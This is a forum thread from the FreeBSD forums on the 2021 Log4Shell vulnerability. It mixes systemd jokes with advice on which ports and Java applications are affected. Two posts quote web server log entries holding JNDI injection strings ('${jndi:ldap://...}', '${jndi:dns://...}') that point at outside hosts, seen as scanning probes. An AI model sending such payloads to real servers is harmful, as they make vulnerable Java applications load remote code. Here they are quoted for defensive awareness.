critical vulnerability in devel log4j

mer · Dec 13, 2021

covacat said:
the myth of open source => more eyes => more secure busted again

See now I've never seen it as "equals" (more eyes equals more secure). I've always taken it to be
"more eyes is potentially more secure". Similar to crypto algorithms.
Of course in software, there must be eyes willing to look for the problem, they must be able to see the potential problem and most important, they need to be looking in the right spot.

covacat · Dec 13, 2021

word on the street is that german blackhats employed by redhat use this bug to install systemd on your boxes

SirDice · Dec 13, 2021

covacat said:
word on the street is that german blackhats employed by redhat use this bug to install systemd on your boxes

Resistance is futile. You will be assimilated by Poettering.

hruodr · Dec 13, 2021

SirDice said:
Resistance is futile. You will be assimilated by Poettering.

You mean resistance against the system (D)?

SirDice · Dec 13, 2021

Systemd of a down? Rage against the systemd?

eternal_noob · Dec 13, 2021

The Best Songs With System in the Title

Have you ever thought about how many songs with system in the title have been written? This list ranks the best songs with system in the name, regardless of genre. Most of the tracks listed here are songs about systems, but almost all of them have different lyrical interpretations, despite the...

www.ranker.com

msplsh · Dec 13, 2021

Is this thread about one of the most serious vulnerabilities this year now derailed into off-topic land because of a grudge against an init system that the OS we're gathered here for doesn't even support?

mer · Dec 13, 2021

Is systemd the forum equivalent of Godwins law?

SirDice · Dec 13, 2021

msplsh said:
Is this thread about one of the most serious vulnerabilities this year now derailed into off-topic land because of a grudge against an init system that the OS we're gathered here for doesn't even support?

Just some light-hearted bantering to break the tension. Humor works rather well in stressful situations.

eternal_noob · Dec 13, 2021

Don't lose your sense of humour or you are lost.

SirDice · Dec 13, 2021

eternal_noob said:
Don't lose your sense of humour or you are lost.

Absolutely.

In any case, this might be useful for someone: https://github.com/NorthwaveSecurity/log4jcheck

Jose · Dec 13, 2021

covacat said:
if i understood correctly this bug is at least 4 years old, since ver 2.10
the myth of open source => more eyes => more secure busted again

It's way older than that. Introduced in Log4j 2.0. I can be a real bore and go on about the history of Java logging in the unlikely event that you're interested.

mer · Dec 13, 2021

Jose said:
It's way older than that. Introduced in Log4j 2.0. I can be a real bore and go on about the history of Java logging in the unlikely event that you're interested.

Hmm. "Ask Jose about Java logging or go get some teeth pulled? Tough decision"

Jose · Dec 13, 2021

mer said:
Hmm. "Ask Jose about Java logging or go get some teeth pulled? Tough decision"

Maybe you're having trouble sleeping? I can help!

jb_fvwm2 · Dec 13, 2021

techsolvency.COM-huge-cheatsheet

Crivens · Dec 14, 2021

mer said:
Hmm. "Ask Jose about Java logging or go get some teeth pulled? Tough decision"

More like "I was run over by a logging truck and they need to fix up my n+1 broken bones without anestetics due to the pandemic. Using rusty spoons. I think the talk about java logging might numb my mind enough for that..."

mer · Dec 14, 2021

Crivens said:
More like "I was run over by a logging truck and they need to fix up my n+1 broken bones without anestetics due to the pandemic. Using rusty spoons. I think the talk about java logging might numb my mind enough for that..."

One thought: Is the logging truck loaded with hardwoods or softwoods? Big difference between oak and pine

VladiBG · Dec 14, 2021

Code:

185.100.87.174 - - [14/Dec/2021:12:12:26 +0200] "GET /?a=%24%7Bjndi%3Aldap://193.3.19.159%3A53/c%7D HTTP/1.1" 200 290

It's time to add some more IPs to my FW

185.100.87.0/24

Those security companies keep probing the net for this exploit.

Code:

45.83.66.109 - - [13/Dec/2021:06:33:59 +0200] "GET /$%7Bjndi:dns://45.83.64.1/securityscan-https443%7D HTTP/1.1" 404 196

Crivens · Dec 14, 2021

mer said:
One thought: Is the logging truck loaded with hardwoods or softwoods? Big difference between oak and pine

Yes. 40 tons of oak hurt you with a lot more style than 40 tons of pine ..

rafael_grether · Dec 14, 2021

Yes VladiBG, a lot of companies.

On my server:

GET /$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D HTTP/1.1

noodlefling · Dec 14, 2021

Just to be clear, is this really only an issue if the devel/log4j port is installed? A vanilla apache install is fine? Or is it buried somewhere inside a default apache install?

Is there a master list of affected ports?

Maybe I'm not looking at the problem correctly?

covacat · Dec 14, 2021

devel/log4j is not vulnerable to this exploit (it is to others)
you need to have something based on java in the 1st place
so just www/apache24 wont be vulnerable

Jose · Dec 14, 2021

noodlefling said:
Maybe I'm not looking at the problem correctly?

The Apache Web server is written in C and is not affected. Any Apache project written in Java may be affected. Any non-Apache project written in Java may be affected.

noodlefling said:
Is there a master list of affected ports?

critical vulnerability in devel log4j

the myth of open source => more eyes => more secure busted again See now I've never seen it as "equals" (more eyes equals more secure). I've always taken it to be "more eyes is potentially more secure". Similar to crypto algorithms. Of course in software, there must be eyes willing to look...

forums.FreeBSD.org

SirDice · Dec 14, 2021

noodlefling said:
Just to be clear, is this really only an issue if the devel/log4j port is installed?

No, not in this case. The issue is only with the 2.x versions of log4j. The version in ports is an old one, still 1.x. That's not vulnerable.

noodlefling said:
A vanilla apache install is fine? Or is it buried somewhere inside a default apache install?

www/apache24 is officially called Apache httpd. It is not affected by this (not a Java application). Apache creates more software besides httpd.

Jose said:
Any Apache project written in Java may be affected. Any non-Apache project written in Java may be affected.

Yes. I would say, any Java project may be affected. The vulnerable log4j 2.x version could be embedded in some application without you being aware of it. The application must be written in Java (that log4j is a Java class) though.

noodlefling · Dec 14, 2021

Thanks! Luckily I have no idea what most of those affected packages are.

pkg audit is coming up with nothing, which is at least not bad news!

critical vulnerability in devel log4j

mer

covacat

SirDice

Administrator

hruodr

SirDice

Administrator

eternal_noob

The Best Songs With System in the Title

msplsh

mer

SirDice

Administrator

eternal_noob

SirDice

Administrator

Jose

mer

Jose

jb_fvwm2

Crivens

Administrator

mer

VladiBG

Crivens

Administrator

rafael_grether

noodlefling

covacat

Jose

critical vulnerability in devel log4j

SirDice

Administrator

noodlefling